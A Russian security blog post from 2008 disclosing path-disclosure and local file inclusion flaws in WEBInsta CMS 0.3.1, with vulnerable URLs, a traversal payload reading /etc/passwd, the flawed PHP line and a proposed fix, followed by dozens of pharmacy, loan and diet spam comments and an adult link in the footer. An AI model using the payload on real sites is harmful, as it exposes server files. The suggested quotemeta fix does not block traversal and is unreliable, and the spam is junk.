SecureBlog

 
 

WEBInsta CMS 0.3.1 - раскрытие путей, локальный инклуд

 

Дата: 23.08.2008, Категория: Взлома и защита

 

Более ранние/поздние версии не смотрел.

Раскрытие путей:
http://host/admin/modules/about.php
http://host/modules/counter/module.def.php
http://host/modules/usersonline/module.def.php

Локальный инклуд:
http://host/admin/modules/about.php?name=../../../../../../../../../etc/passwd%00

$name=$_GET['name'];
include("../../modules/$name/module.info.php");

А я думал, что такого уже нигде не встретишь...

Защититься можно так:

<?php
// закрываем доступ для обычного посетителя
if(!isset($_SESSION["login"])) {
  header("Location: ../admin.php");
return;
}
// проверяем $_GET['name'] на вшивость
$name = quotemeta($_GET['name']);
if(file_exists("../../modules/$name/module.info.php")) {
  include("../../modules/$name/module.info.php");
} else { die(); }
?>

 

order Levitra 27.04.2012
<a href=http://levitrapharmw.com/#8255>Levitra price</a> generic levitra fast delivery http://levitrapharmw.com/#5905 prevacid voucher generic levitra

buy Propecia online 27.04.2012
<a href="http://cialiscerpharmacy.com/#9647">buy cialis cheap</a> cialis buy now <a href=http://cialiscerpharmacy.com/#3907>buy Cialis online</a> buy brand cialis online http://cialiscerpharmacy.com/#9928 buy generic cialis online uk

Veiffuhtime 28.04.2012
<a href=http://buycheaponlinelevitra.com/#14906>generic levitra</a> - <a href=http://buycheaponlinelevitra.com/#17254>buy generic levitra</a> , http://buycheaponlinelevitra.com/#15686 cheap generic levitra

Zithromax 28.04.2012
http://prednisonepharm.com/#7933 prednisolone drug side effects

cialis prices 01.05.2012
п»їhttp://zithromaxsupport.com/#1892 dihydrate buy azithromycin <a href=http://zithromaxsupport.com/#1246>mg buy zithromax</a> buy zithromax antibiotic

Illivysip 02.05.2012
<a href=http://buylevitrahereonline.com/#8400>generic levitra</a> - <a href=http://buylevitrahereonline.com/#13890>cheap levitra online</a> , http://buylevitrahereonline.com/#18991 levitra 20 mg

Nolvadex 03.05.2012
<a href="http://medicationfromcanada.com/#1977">online prescription drugs</a> viagra online pharmacy http://medicationfromcanada.com/#3466 cvs pharmacy coupons new prescription 2010 <a href=http://medicationfromcanada.com/#1011>cheap canadian drugs</a> diplomat specialty pharmacy

PaigneeEstina 04.05.2012
<a href=http://cheapcialisonlinehere.com/#6254>cialis online</a> - <a href=http://cheapcialisonlinehere.com/#11892>cialis online without prescription</a> , http://cheapcialisonlinehere.com/#21335 buy generic cialis

BuyCialis 06.05.2012
http://viagracialisit.com/#0797 cialis 5 mg one day <a href=http://viagracialisit.com/#2050>viagra cialis</a> cialis generico frode

cash lenders 07.05.2012
http://cialisprecioespana.com/#8897 tadalafil ebay <a href=http://cialisprecioespana.com/#6175>comprar cialis</a> riesgos del tadalafil

cheap sildenafil citrate india 10.05.2012
http://cialistadalafilfr.com/#5992 tadalafil pas cher <a href=http://cialistadalafilfr.com/#0374>cialistadalafilfr.com</a> cialis generique pharmacie

frmesbmlvsc 10.05.2012
cvrlccimrjsmvmurilwpfawtvsu, <a href="http://www.topgeldzaken.nl/lenen-zonder-bkr-toetsing//">lenen zonder bkr toetsing</a>, tcdzwlmft, <a href=http://www.topgeldzaken.nl/lenen-zonder-bkr-toetsing//>geld lenen zonder bkr toetsing</a>, hBWqdsunz, http://www.topgeldzaken.nl/geld-lenen.htm/ geld lenen, ffLuwmdir, <a href="http://whitehatcopycat2-reviews.net/">The Renegade Diet</a>, ivNmoYyZW, <a href=http://whitehatcopycat2-reviews.net/>The Renegade Diet Review</a>, KxSEZpeTv, http://whitehatcopycat2-reviews.net/ The Renegade Diet Reviews, LPkvRiAlB, <a href="http://hypotheekaflossingsvrije.nl/">The Renegade Diet</a>, bbTigQWRV, <a href=http://hypotheekaflossingsvrije.nl/>The Renegade Diet Review</a>, RWWlWfrIp, http://hypotheekaflossingsvrije.nl/ The Renegade Diet Reviews, gwPyjowbq, <a href="http://certified-financialplanner.net>Text Your Ex Back</a>, cHkrVhhym, <a href=http://certified-financialplanner.net>Text Your Ex Back Review</a>, UIZoWbxaO, http://certified-financialplanner.net/ Text Your Ex Back Reviews, OzLoJBGtx, <a href="http://cheat-yourwaythin.net/">Text Your Ex Back</a>, uNKMycfuy, <a href=http://cheat-yourwaythin.net/>Text Your Ex Back Review</a>, FKWUFQKOk, http://cheat-yourwaythin.net/ Text Your Ex Back Reviews,UyLmfobLI, <a href="http://fasgroup.net/">Text Your Ex Back</a>, JmDkvviEA, <a href=http://fasgroup.net/>Text Your Ex Back Review</a>, WgersaWgu, http://fasgroup.net/ Text Your Ex Back Reviews, JmRFmwARz.

Omidwimalom 11.05.2012
<a href=http://buynolvadexhereonline.com/#18957>buy nolvadex online</a> - <a href=http://buynolvadexhereonline.com/#4467>generic nolvadex</a> , http://buynolvadexhereonline.com/#11355 nolvadex 10 mg

GOAWEERESSODE 12.05.2012
http://offertacialis.com/#5812 viagra vasarlas cialis generico <a href=http://offertacialis.com/#9095>comprare cialis originale</a> 20g cialis generico

enhaphesilany 12.05.2012
<a href="http://viagragenprecio.com/#0633">viagra casera</a> xex sildenafil alpha blocker http://viagragenprecio.com/#8396 sildenafil 65 horas <a href=http://viagragenprecio.com/#5683>viagra precio farmacia</a> magnus sildenafil sidus precio viagra

GOAWEERESSODE 12.05.2012
http://purchaseallipills.com/#6386 alli weight loss pills <a href=http://purchaseallipills.com/#7922>alli pills</a> Alli

veiteereria 13.05.2012
http://orderclomidonline.com/#5877 buy clomid in australia cheap generic http://offertacialis.com/#5252 cialis 20 mg forum

unsowesiodist 14.05.2012
<a href=http://buycheapviagraonlinestore.com/#18738>viagra price</a> - <a href=http://buycheapviagraonlinestore.com/#5181>buy cheap viagra</a> , http://buycheapviagraonlinestore.com/#15743 viagra without prescription

smalsitty 14.05.2012
<a href=http://gidstyle.com/category-4-b0-kosmetika-dlya-volos.html>Косметика для волос</a>
<a href=http://xrumerbase.info/10-bazy-dannykh-dl-xrumer.html>Косметика для лица и тела</a>
<a href=http://gidstyle.com/category-7-b0-kosmetika-dlya-manikyura-i-pedikyura.html>Косметика для маникюра и педикюра</a>
<a href=http://gidstyle.com/category-895-b0-sredstva-dlya-depilyacii.html>Средства для депиляции</a>
<a href=http://gidstyle.com/category-1-b0-oborudovanie-dlya-salonov-krasoty.html>Оборудование для салонов красоты</a>
<a href=http://gidstyle.com/category-2-b0-parikmaxerskij-instrument.html>Парикмахерский инструмент</a>
<a href=http://gidstyle.com/category-24-b0-feny.html>Фены</a>
<a href=http://gidstyle.com/category-14-b0-nozhnicy.html>Ножницы</a>

Bizeexind 15.05.2012
<a href=http://buyviagraonlinerating.com/#322>buy viagra online</a> - <a href=http://buyviagraonlinerating.com/#9408>cheap generic viagra</a> , http://buyviagraonlinerating.com/#18062 purchase viagra online

Immabousbaf 19.05.2012
<a href=http://paydayloanshereonline.com/#9688>Payday Loans</a> - <a href=http://paydayloanshereonline.com/#15919>Payday Loans</a> , http://paydayloanshereonline.com/#10928 Payday Loans

Добавить комментарий

Заполните обязательные поля формы

Имя (*) Сайт

 

О блоге

  • Освещение проблем безопасности web приложений и серверов. Поисковая оптимизация.
    Ник: c0nst
    icq: 331699888

 

Рубрики

Амитек - программирование офисная атс Panasonic KX-TEB308 в Москве

RSS-лента

Друзья и партнеры

сайт о поддоне

Счетчики

  • Rambler's Top100
  • Рейтинг@Mail.ru
вопрос юристу, юридическое обслуживание . электрические накопительные водонагреватели . Порно бучей.Домашнее порно смотреть онлайн. . заказать шины |
© SecureBlog | Coded by c0nst